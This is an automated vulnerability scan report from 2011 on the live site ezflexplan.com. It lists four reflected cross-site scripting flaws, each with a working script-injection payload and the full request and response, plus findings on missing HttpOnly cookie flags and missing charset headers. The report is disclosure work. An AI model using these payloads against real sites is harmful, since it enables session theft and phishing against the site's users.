XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, ezflexplan.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:50:55 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
Loading

1. Cross-site scripting (reflected)

1.1. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]

1.2. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]

1.3. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]

1.4. http://www.ezflexplan.com/navigation/menu.asp [id parameter]

2. Cookie without HttpOnly flag set

2.1. http://www.ezflexplan.com/lbmc/

2.2. http://www.ezflexplan.com/navigation/menu.asp

3. HTML does not specify charset

3.1. http://www.ezflexplan.com/ContentPages/employers.html

3.2. http://www.ezflexplan.com/ContentPages/er_admintls.html

3.3. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html

3.4. http://www.ezflexplan.com/ContentPages/er_htsuap.html

3.5. http://www.ezflexplan.com/ContentPages/nav_employers.html

3.6. http://www.ezflexplan.com/navigation/frameset.asp

3.7. http://www.ezflexplan.com/navigation/menu.asp



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e5ba"><script>alert(1)</script>b96358f5505 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba"><script>alert(1)</script>b96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 962
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name="leftnav" src="/ContentPages/nav_4e5ba"><script>alert(1)</script>b96358f5505" marginwidth="0" marginheight="0"
scrolling="auto" frameborder="no">
...[SNIP]...

1.2. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1212"><script>alert(1)</script>9703c6d326e was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=d1212"><script>alert(1)</script>9703c6d326e&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 866
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=lbmc&amp;email=d1212"><script>alert(1)</script>9703c6d326e&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

1.3. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 113a5"><script>alert(1)</script>cc1a308a602 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=113a5"><script>alert(1)</script>cc1a308a602&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 892
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=113a5"><script>alert(1)</script>cc1a308a602&amp;email=tmangrum@lbmc.com&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...

1.4. http://www.ezflexplan.com/navigation/menu.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7284e"><script>alert(1)</script>0b95bf251de was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/menu.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3118
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
<a href="/navigation/contact_us.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum%40lbmc%2Ecom&content=contact_us.asp"
onclick="parent.frames[1].location='/ContentPages/nav_contact_us.html'"
target="mainbody" onmouseover="HoverCraft('Image3', Image3On.src);"
onmou
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.ezflexplan.com/lbmc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ezflexplan.com
Path:   /lbmc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/ HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:36:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2793
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQSRSARR=HADFNNCCODEIFBHJGPCFBEEJ; path=/
Cache-control: private


<html>

<head>
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script LANGUAGE="javascript">
<!--
   var aIm
...[SNIP]...

2.2. http://www.ezflexplan.com/navigation/menu.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /navigation/menu.asp?id=lbmc&email=tmangrum@lbmc.com&content=4e5ba%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb96358f5505
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 11:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3032
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQSRSARR=IHEFNNCCEGJCMJNIGILGHNGE; path=/
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...

3. HTML does not specify charset  previous
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


3.1. http://www.ezflexplan.com/ContentPages/employers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/employers.html

Request

GET /ContentPages/employers.html?id=lbmc&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 6158
Content-Type: text/html
Last-Modified: Thu, 11 Nov 2010 19:01:35 GMT
Accept-Ranges: bytes
ETag: "8e385edcd281cb1:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:37 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<meta http-equiv="Content-Language" content="en-us">
<title>What is a Flexible Spending Account?</title>
<script lang
...[SNIP]...

3.2. http://www.ezflexplan.com/ContentPages/er_admintls.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_admintls.html

Request

GET /ContentPages/er_admintls.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/nav_employers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 2942
Content-Type: text/html
Last-Modified: Thu, 07 Feb 2002 18:05:46 GMT
Accept-Ranges: bytes
ETag: "0f9b7102b0c11:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:13 GMT

<html>

<head>
<title>Administrative Tools for Employers</title>
<style>
<!--
a:link { color: #6699cc }
a:visited { color: #999999 }
a:hover { color: #cc9900 }
p { fo
...[SNIP]...

3.3. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_enrllmnttools.html

Request

GET /ContentPages/er_enrllmnttools.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/er_admintls.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 2547
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 15:15:02 GMT
Accept-Ranges: bytes
ETag: "26b0aa22febecb1:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:19 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<title>Enrollment Tools</title>
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0">

<table cellspacing
...[SNIP]...

3.4. http://www.ezflexplan.com/ContentPages/er_htsuap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/er_htsuap.html

Request

GET /ContentPages/er_htsuap.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/ContentPages/nav_employers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 5215
Content-Type: text/html
Last-Modified: Tue, 03 Apr 2007 16:22:32 GMT
Accept-Ranges: bytes
ETag: "f81dd447c76c71:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:45:08 GMT

<html>

<head>
<link rel="stylesheet" href="er_content.css" type="text/css">
<title>How to Set-Up a Plan</title>
<script language="JavaScript" fptype="dynamicanimation">
<!--
function dynAnimat
...[SNIP]...

3.5. http://www.ezflexplan.com/ContentPages/nav_employers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /ContentPages/nav_employers.html

Request

GET /ContentPages/nav_employers.html HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Content-Length: 4111
Content-Type: text/html
Last-Modified: Wed, 20 Nov 2002 18:50:32 GMT
Accept-Ranges: bytes
ETag: "08cd7b3c590c21:1678"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:39 GMT

<html>

<head>
<title>Employer Menu</title>
<base target="mainbody">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<SCRIPT L
...[SNIP]...

3.6. http://www.ezflexplan.com/navigation/frameset.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 814
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...

3.7. http://www.ezflexplan.com/navigation/menu.asp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Request

GET /navigation/menu.asp?id=lbmc&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3032
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...

Report generated by XSS.CX at Mon May 09 07:50:55 CDT 2011.